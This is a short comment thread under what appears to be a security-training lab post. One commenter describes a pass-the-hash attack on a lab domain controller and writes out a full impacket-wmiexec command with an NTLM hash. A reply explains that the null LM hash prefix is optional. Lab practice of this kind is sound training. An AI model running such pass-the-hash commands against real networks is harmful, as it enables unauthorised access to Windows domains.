4 MIN READ
Blog Post
steven
Silver II
3 days agoWas a nice lab. I struggled quite because I got a golden ticket (pass-the-hash) but wasn't able to access \\DC\c$
But then, I've changed to another strategy and instead of psexec I used:
impacket-wmiexec -dc-ip <DC ip> -target-ip <DC ip> administrator@<DC ip> -hashes aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334
maybe to explain, why the hash has added an 'aad3b435b51404eeaad3b435b51404ee':
Most newer Windows versions do not store passwords in LM format by default, and the string aad3b435b51404eeaad3b435b51404ee, called the Null LM hash, signifies that it is empty. So we need to add it.
StefanApostol
Immerser
3 days agohi! glad you liked it. also for impacket tools, you don't need to add the empty LM hash, you can simply use :2c9299e44ee3abcf5c6f9e7938123334 (notice the ":" is still there)